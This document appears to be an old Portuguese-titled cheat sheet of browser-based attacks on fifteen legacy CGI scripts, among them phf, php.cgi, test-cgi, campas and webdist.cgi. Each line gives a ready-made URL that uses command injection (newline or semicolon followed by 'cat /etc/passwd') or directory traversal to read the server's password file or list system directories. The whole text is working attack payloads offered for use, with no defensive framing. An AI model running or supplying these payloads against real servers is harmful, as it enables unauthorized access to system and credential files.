Arquivos Método de ataque via browser 

phf          http://xxx.xxx.xxx/cgi-bin/phf?Qalias=x%0acat%20/etc/passwd 
php.cgi      http://xxx.xxx.xxx/cgi-bin/php.cgi?/etc/passwd 
test-cgi     http://xxx.xxx.xxx/cgi-bin/test-cgi?/etc/* 
query        http://xxx.xxx.xxx/cgi-bin/query?%0a/bin/cat%20/etc/passwd 
faxsurvey    http://xxx.xxx.xxx/cgi-bin/faxsurvey?/bin/cat%20/etc/passwd 
htmlscript   http://xxx.xxx.xxx/cgi-bin/htmlscript?../../../../etc/passwd 
webdist.cgi  http://xxx.xxx.xxx/cgi-bin/webdist.cgi?distloc=;cat%20/etc/passwd 
nph-test-cgi http://xxx.xxx.xxx/cgi-bin/nph-test-cgi?/etc/* 
echo         http://xxx.xxx.xxx/cgi-bin/echo?%0Acat%20/etc/passwd 
view-source  http://xxx.xxx.xxx/cgi-bin/view-source?../../../../../etc/passwd 
pfdisplay    http://xxx.xxx.xxx/cgi-bin/pfdispaly.cgi?/../../../../etc/passwd 
campas       http://xxx.xxx.xxx/cgi-bin/campas?%0acat%0a/etc/passwd%0a 
wrap         http://xxx.xxx.xxx/cgi-bin/wrap?/../../../../../etc 
whatever     http://xxx.xxx.xxx/cgi-bin/handler/whatever;cat /etc/passwd|? data=Download 
xenolith     http://xxx.xxx.xxx/cgi-bin/handler/xenolith;cat /etc/passwd/| ?data=Download